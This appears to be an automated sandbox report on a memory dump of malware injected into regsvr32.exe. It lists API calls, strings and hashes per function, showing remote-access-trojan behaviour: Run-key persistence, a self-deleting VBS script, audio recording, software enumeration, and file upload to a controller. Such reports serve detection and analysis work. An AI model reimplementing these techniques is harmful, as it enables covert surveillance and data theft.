                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02A1B266
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                      • API String ID: 738084811-1354618412
                                      • Opcode ID: f79e2411667b2f040bc15f55c650752c0c51799af99523fd5810ab5f5602a0fa
                                      • Instruction ID: 77bd611cb416086f1822b2dc695f24c83a2a5ef7bd83cd7d58b0eb5a68dfd667
                                      • Opcode Fuzzy Hash: f79e2411667b2f040bc15f55c650752c0c51799af99523fd5810ab5f5602a0fa
                                      • Instruction Fuzzy Hash: 9E5193716C43056EE315B770EDD9EBF77AEEB84368F00081AB54A861D0EF608D19CE66
                                      Function 02A0D096 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02A0D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02A752F0,?,pth_unenc), ref: 02A0D1F7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A27D,00000000,00000000,?,02A0D442,?,00000000), ref: 02A0B8BB
                                        • Part of subcall function 02A0B8AC: UnhookWindowsHookEx.USER32(02A750F0), ref: 02A0B8C7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A267,00000000,?,02A0D442,?,00000000), ref: 02A0B8D5
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D412
                                      • ExitProcess.KERNEL32 ref: 02A0D419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-3018399277
                                      • Opcode ID: 195fa7f95848766eb6471f07aa495a4a95b25758e2573a333424d8da2eae266d
                                      • Instruction ID: 88c6a7805d0196ad3ca943939ea28f581464540aaf99917d707ad2aa57c7f4b1
                                      • Opcode Fuzzy Hash: 195fa7f95848766eb6471f07aa495a4a95b25758e2573a333424d8da2eae266d
                                      • Instruction Fuzzy Hash: E881A1216843006BD715FB60FEE49EFB3AAAF95704F50082EA54A971D1EF609D0DCE92
                                      Function 02A01A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02A01AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02A01B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02A01B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02A01B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02A01B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02A01B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02A01B54
                                      • WriteFile.KERNEL32(00000000,02A72AAA,00000002,00000000,00000000), ref: 02A01B65
                                      • WriteFile.KERNEL32(00000000,02A72AAC,00000004,00000000,00000000), ref: 02A01B75
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02A01B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02A01B96
                                      • WriteFile.KERNEL32(00000000,02A72AB6,00000002,00000000,00000000), ref: 02A01BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02A01BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02A01BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 5a46f387758b422e82a29643042ffddd8f3090459553bf290a9198c8d49a521d
                                      • Instruction ID: 72a0dbc885598f60f839230302a080b805bb8c6c44dccac8bd863ec4c5e3e943
                                      • Opcode Fuzzy Hash: 5a46f387758b422e82a29643042ffddd8f3090459553bf290a9198c8d49a521d
                                      • Instruction Fuzzy Hash: E5413F72544319BAE210DA51DD86FBB7FECEB85F50F40081AFA44D6080DBA4E909DBB3
                                      Function 02A07270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\regsvr32.exe,00000001,02A0764D,C:\Windows\SysWOW64\regsvr32.exe,00000003,02A07675,02A752D8,02A076CE), ref: 02A07284
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A0728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02A072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02A072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02A072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02A072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02A072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-1248235463
                                      • Opcode ID: 97a603a815906f2f68503a69bb67f176e847bcfbd8e5f82e28fbf170c8a7ca99
                                      • Instruction ID: 00f12cf8c16032772f07578a2f32b92cd154b774c13e25058b0aec4c6d73241f
                                      • Opcode Fuzzy Hash: 97a603a815906f2f68503a69bb67f176e847bcfbd8e5f82e28fbf170c8a7ca99
                                      • Instruction Fuzzy Hash: 4C0175E0E8031676BB216B3A6C98D1BEF9CAE587513094C27B805D3141EFBCD415CE64
                                      Function 02A0CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 02A0CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02A750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 02A0CE20
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\regsvr32.exe,00000000,00000000,00000000,00000000,00000000,?,02A750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 02A0CED0
                                      • _wcslen.LIBCMT ref: 02A0CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 02A0CF6E
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\regsvr32.exe,00000000,00000000), ref: 02A0CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02A0CFC3
                                      • _wcslen.LIBCMT ref: 02A0CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02A0CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A750E4,0000000E), ref: 02A0D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000001), ref: 02A0D04B
                                      • ExitProcess.KERNEL32 ref: 02A0D062
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Windows\SysWOW64\regsvr32.exe$del$open
                                      • API String ID: 1579085052-666830377
                                      • Opcode ID: 1bfd2ddb55df872a89b85894abbcfb491777827a701efdd896cc6b7d47967306
                                      • Instruction ID: da3c77ccb68469b85b225bce02477b2b7f9227b1a464ef0ce28c844109a1428b
                                      • Opcode Fuzzy Hash: 1bfd2ddb55df872a89b85894abbcfb491777827a701efdd896cc6b7d47967306
                                      • Instruction Fuzzy Hash: C451B1216883016BE609B764BDD0FBFA79FAF94B25F40041FF60E861C1EF549D058AA6
                                      Function 02A1C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 02A1C036
                                      • _memcmp.LIBVCRUNTIME ref: 02A1C04E
                                      • lstrlenW.KERNEL32(?), ref: 02A1C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02A1C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02A1C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02A1C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 02A1C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02A1C12C
                                      • _wcslen.LIBCMT ref: 02A1C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 02A1C15B
                                      • GetLastError.KERNEL32 ref: 02A1C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02A1C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 02A1C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 02A1C1C8
                                      • GetLastError.KERNEL32 ref: 02A1C1D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: f34cc511b90b43f9c0a2db32b648ba7d6d1c07680ca802f74dc8856bb370ed6d
                                      • Instruction ID: f30ee38367bc950df9e4ac40d62ff6bbb4c769de7499d4d8a45fb77bd8fca969
                                      • Opcode Fuzzy Hash: f34cc511b90b43f9c0a2db32b648ba7d6d1c07680ca802f74dc8856bb370ed6d
                                      • Instruction Fuzzy Hash: 4341AE71984316ABDB20DF60D888AABB7EDBB59764F00092AF581C2160EF70C55CCBD2
                                      Function 02A4F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 9e2e220bd868e95ad1f5ba1c5aafda52d8b446ea6e74679a10ea3a7f7b318215
                                      • Instruction ID: ba68d54f315b7a7bfaba0e33d6eca3dca7f499d7d8d461a74b72c1deaa1b1671
                                      • Opcode Fuzzy Hash: 9e2e220bd868e95ad1f5ba1c5aafda52d8b446ea6e74679a10ea3a7f7b318215
                                      • Instruction Fuzzy Hash: 5ED15872D40300AFEB34AF789DC0B6AB7A9EF81314F04556EE915EB680EF35D9018B95
                                      Function 02A14D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02A14DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 02A14E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02A14E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 02A14E76
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02A14E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02A14E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-744132762
                                      • Opcode ID: fbf3e9744024cbdf6af87c43047779b12cf5bae07b13d2221d543271738af9b1
                                      • Instruction ID: 164c58d64025c6b2326a1d0093a48eae2072c3e62cfc692529c747b67073d5e7
                                      • Opcode Fuzzy Hash: fbf3e9744024cbdf6af87c43047779b12cf5bae07b13d2221d543271738af9b1
                                      • Instruction Fuzzy Hash: 0431F5B1941315ABD320DB28DC88E9FB7DDAF88764F000A25E94897240DF34C9058FE6
                                      Function 02A1D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 02A1D5DA
                                      • GetCursorPos.USER32(?), ref: 02A1D5E9
                                      • SetForegroundWindow.USER32(?), ref: 02A1D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02A1D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,02A74B48), ref: 02A1D65D
                                      • ExitProcess.KERNEL32 ref: 02A1D665
                                      • CreatePopupMenu.USER32 ref: 02A1D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02A1D680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: 059c75cc858d512896607cdb82b300bad2bd9e29962517927f49aa7ba42d8b26
                                      • Instruction ID: edd245d91e6cdd5987c79246dd63dd4594b1a0185dda50e8b3dbd599c9f73c70
                                      • Opcode Fuzzy Hash: 059c75cc858d512896607cdb82b300bad2bd9e29962517927f49aa7ba42d8b26
                                      • Instruction Fuzzy Hash: DC215A7589021AEFDB154FA4ED0DA6B3B39FB08365F000918F606990A0DF71DD22DB54
                                      Function 02A45D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 97c212e11f89d124365e2fbfee323a6a6135155e826f1098384cffef70efe69f
                                      • Instruction ID: 82e450d46b00610f0b6407834d791282cfe29631a02547aa3353cb8f76a32739
                                      • Opcode Fuzzy Hash: 97c212e11f89d124365e2fbfee323a6a6135155e826f1098384cffef70efe69f
                                      • Instruction Fuzzy Hash: 10B1BD71D002059FDB10CF68C880BEEBBB9FF89705F44816AE998A7241DF75E941CB60
                                      Function 02A512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 02A5130A
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5051F
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50531
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50543
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50555
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50567
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50579
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5058B
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5059D
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505AF
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505C1
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505D3
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505E5
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505F7
                                      • _free.LIBCMT ref: 02A512FF
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A51321
                                      • _free.LIBCMT ref: 02A51336
                                      • _free.LIBCMT ref: 02A51341
                                      • _free.LIBCMT ref: 02A51363
                                      • _free.LIBCMT ref: 02A51376
                                      • _free.LIBCMT ref: 02A51384
                                      • _free.LIBCMT ref: 02A5138F
                                      • _free.LIBCMT ref: 02A513C7
                                      • _free.LIBCMT ref: 02A513CE
                                      • _free.LIBCMT ref: 02A513EB
                                      • _free.LIBCMT ref: 02A51403
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 19483a8df8079526b60ea3ad556a366fcfe4720d8ce28a856b9ee8f1c10dce2c
                                      • Instruction ID: eef0799514cc1893aad4c1c20d86c45b1b6b6e0ac92f8dabdcff002ada223f95
                                      • Opcode Fuzzy Hash: 19483a8df8079526b60ea3ad556a366fcfe4720d8ce28a856b9ee8f1c10dce2c
                                      • Instruction Fuzzy Hash: 93316731600310DAEF60AF39D984B6BB7EAEB41325F5489A9E868D6550DF70ED80CB60
                                      Function 02A08B7A Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02A08CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02A08D1B
                                      • __aulldiv.LIBCMT ref: 02A08D4D
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02A08E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02A08E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 02A08F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 02A08FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 02A08FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                      • API String ID: 3086580692-2596673759
                                      • Opcode ID: c036d57931545c842669e7e241752c4051f4a9fb66d826424c366455e99ccf80
                                      • Instruction ID: 1ef9b31379250f8cd9abe570c4eceeddd29af1c245a08cad95c333b592bf3a19
                                      • Opcode Fuzzy Hash: c036d57931545c842669e7e241752c4051f4a9fb66d826424c366455e99ccf80
                                      • Instruction Fuzzy Hash: 50B18D316883409FD314EB24EAD4AAFB7E6AF84350F40491EF58A862D0EF749909CF56
                                      Function 02A1C6F3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32 ref: 02A1C6F5
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02A1C726
                                      • RegCloseKey.ADVAPI32(?), ref: 02A1C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                      • API String ID: 1332880857-3730529168
                                      • Opcode ID: 02bba64826fe4a40e84ae16f503a237ab2ff52c3cbde48a075bd2af31af13cae
                                      • Instruction ID: f242091db41ba5a8ad44e568f772b7f505d44502f6c1de49cf51da11b1b62e1d
                                      • Opcode Fuzzy Hash: 02bba64826fe4a40e84ae16f503a237ab2ff52c3cbde48a075bd2af31af13cae
                                      • Instruction Fuzzy Hash: 3661ED711482419AD725EB20E990EEFB3EABF94314F10496FE59A82190FF709D49CE92
                                      Function 02A048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 02A048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02A04A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02A04A0E
                                      • WSAGetLastError.WS2_32 ref: 02A04A21
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: a734a8d9fc046d92c478478ba73aba1459621bd1289089ace012921428b2f7f2
                                      • Instruction ID: 22353b52881e271366c4a3611fc152dedb561530fbb63f5a05bff64a369d0f29
                                      • Opcode Fuzzy Hash: a734a8d9fc046d92c478478ba73aba1459621bd1289089ace012921428b2f7f2
                                      • Instruction Fuzzy Hash: 1941E564FC03027BA6147B7A9ADE93EBB67FB41350B800559D90206AC5EF119C24CFE3
                                      Function 02A50600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 20f9c6a7b4d154e1d419c74e8f8ea7c664c6e4349b38946461126bc31546b49f
                                      • Instruction ID: c2fa40dafcebbece24d6f09c64665691d0aa3f7dec291bc5b5267281d7998160
                                      • Opcode Fuzzy Hash: 20f9c6a7b4d154e1d419c74e8f8ea7c664c6e4349b38946461126bc31546b49f
                                      • Instruction Fuzzy Hash: 7CC15372E40214AFDB20DBA8CD82FEF77F9AB49700F544165FE05EB281DA709D418BA4
                                      Function 02A12AB4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02A12ACD
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A040F5,?,?,02A040F5,02A65E74), ref: 02A1857E
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A65E74,?,?,02A040F5,02A65E74), ref: 02A18587
                                      • Sleep.KERNEL32(0000000A,02A65E74), ref: 02A12C1F
                                      • Sleep.KERNEL32(0000000A,02A65E74,02A65E74), ref: 02A12CC1
                                      • Sleep.KERNEL32(0000000A,02A65E74,02A65E74,02A65E74), ref: 02A12D63
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12DC5
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12DFC
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12E38
                                      • Sleep.KERNEL32(000001F4,02A65E74,02A65E74,02A65E74), ref: 02A12E52
                                      • Sleep.KERNEL32(00000064), ref: 02A12E94
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "
                                      • API String ID: 1223786279-3856184850
                                      • Opcode ID: 4dacd0aaefdfc1e5164dedf002ece02f1cf8f11d1a51f60232ea38dcc16e0629
                                      • Instruction ID: c41de7164a073d953ea8701070058251d6dacb72054438ec82c609b6295bba81
                                      • Opcode Fuzzy Hash: 4dacd0aaefdfc1e5164dedf002ece02f1cf8f11d1a51f60232ea38dcc16e0629
                                      • Instruction Fuzzy Hash: 620210315883418AD329FB60E9D4BEFB3E6AF94354F504C2ED58A471D0EF709A4ACE52
